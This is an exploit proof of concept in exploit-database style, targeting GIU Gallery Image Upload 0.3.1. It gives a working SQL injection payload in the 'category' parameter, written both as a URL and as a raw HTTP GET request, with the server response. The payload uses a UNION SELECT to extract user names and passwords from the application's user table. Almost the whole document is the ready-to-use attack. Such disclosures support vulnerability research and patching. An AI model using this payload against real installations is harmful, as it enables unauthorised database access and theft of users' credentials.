# Exploit Title: GIU Gallery Image Upload 0.3.1 - 'category' SQL Injection # Dork: N/A # Date: 2018-10-16 # Exploit Author: Ihsan Sencan # Vendor Homepage: http://tradesouthwest.com # Software Link: https://sourceforge.net/projects/giugalleryimageupload/ # Version: 0.3.1 # Category: Webapps # Tested on: WiN7_x64/KaLiLinuX_x64 # CVE: N/A # POC: # 1) # http://localhost/[PATH]/index.php?category=[SQL] %27++unIOn+SElect+0x496873616e53656e63616e%2c0x496873616e53656e63616e%2c0x496873616e53656e63616e%2c(SElect(@x)From(SElect(@x:=0x00)%20%2c(SElect(@x)From(user)WHERE(@x)IN(@x:=COncaT(0x20%2c@x%2c0x557365726e616d65203a%2cfull_name%2c0x3c62723e506173733a20%2cuser_pwd%2c0x3c62723e))))x)%2c0x496873616e53656e63616e%2c0x496873616e53656e63616e--+- GET /[PATH]/index.php?category=Image%20Gallery%27++unIOn+SElect+0x496873616e53656e63616e%2c0x496873616e53656e63616e%2c0x496873616e53656e63616e%2c(SElect(@x)From(SElect(@x:=0x00)%20%2c(SElect(@x)From(user)WHERE(@x)IN(@x:=COncaT(0x20%2c@x%2c0x557365726e616d65203a%2cfull_name%2c0x3c62723e506173733a20%2cuser_pwd%2c0x3c62723e))))x)%2c0x496873616e53656e63616e%2c0x496873616e53656e63616e--+- HTTP/1.1 Host: TARGET User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Connection: keep-alive HTTP/1.1 200 OK Date: Tue, 16 Oct 2018 00:23:41 GMT Server: Apache/2.4.25 (Win32) OpenSSL/1.0.2j PHP/5.6.30 X-Powered-By: PHP/5.6.30 Content-Length: 2300 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8